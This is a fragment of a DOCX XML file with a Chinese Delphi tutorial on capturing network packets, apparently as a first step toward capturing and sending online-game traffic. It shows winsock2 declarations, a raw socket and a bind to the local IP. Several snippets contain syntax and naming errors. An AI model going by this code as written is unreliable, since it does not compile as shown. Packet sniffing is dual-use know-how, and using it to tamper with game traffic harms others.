          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在封包编程里面我准备分两个步骤对大家进行讲解：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、封包的捕获，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、封包的发送。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　首先我们要实现的是封包的捕获：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Delphi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的封装的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版的，很自然</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就用不成。如果要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们要对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Delphi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面做一个接口，才可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、如何做</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的接口？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）我们要先定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock2.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所用得到的类型，在这里我们以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSA_DATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型做示范，大家可以举一仿三的来实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他类型的封装。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　我们要知道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSA_DATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型会被用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，大家会发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是引用参数，在传入参数时传的是变量的地址，所以我们对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSA_DATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做以下封装：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">const </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">WSADESCRIPTION_LEN = 256; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">WSASYS_STATUS_LEN = 128; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">type </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">PWSA_DATA = ^TWSA_DATA; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">WSA_DATA = record </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">wVersion: Word; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">wHighVersion: Word; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">szDescription: array[0..WSADESCRIPTION_LEN] of Char; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">szSystemStatus: array[0..WSASYS_STATUS_LEN] of Char; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">iMaxSockets: Word; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">iMaxUdpDg: Word; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">lpVendorInfo: PChar; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">end; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">TWSA_DATA = WSA_DATA; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）我们要从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WS2_32.DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的函数，在此我们也是以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSAStartup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为例做函数引入：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">function WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer; stdcall; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">implementation </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">const WinSocket2 = &amp;#39;WS2_32.DLL&amp;#39;; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">function WSAStartup; external winsocket name &amp;#39;WSAStartup&amp;#39;; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　通过以上方法，我们便可以对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做接口，下面我们就可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做封包捕获了，不过首先要有一块网卡。因为涉及到正在运作的网络游戏安全问题，所以我们在这里以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包为例做封包捕获，如果下面的某些数据类型您不是很清楚，请您查阅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）我们要起动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这时个要用到的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSAStartup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，用法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>INTEGER WSAStartup(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wVersionRequired: word</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSData: TWSA_DATA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>句柄，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">m_hSocket:=Socket(AF_INET, SOCK_RAW, IPPROTO_IP); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">INTEGER socket(af: Integer, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Struct: Integer, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>protocol: Integer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">m_hSocket:=Socket(AF_INET, SOCK_RAW, IPPROTO_IP); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在程序里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m_hSocket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>句柄，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AF_INET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SOCK_RAW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IPPROTO_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>均为常量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SOCK_ADDR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型，跟据我们的网卡</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sock_ADDR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型附值，然后我们使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来绑定我们的网卡，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数用法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">Type </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">IN_ADDR = record </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>S_addr : PChar;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>End;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">Type </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">TSOCK_ADDR = record </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>sin_family: Word;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>sin_port: Word;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>sin_addr : IN_ADDR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">sin_zero: array[0..7] of Char; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>End;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>var</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>LocalAddr:TSOCK_ADDR;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>LocalAddr.sin_family: = AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>LocalAddr.sin_port: = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">LocalAddr.sin_addr.S_addr: = inet_addr(&amp;#39;192.168.1.1&amp;#39;); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／这里你自己的网卡的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>inet_addr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个函数是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
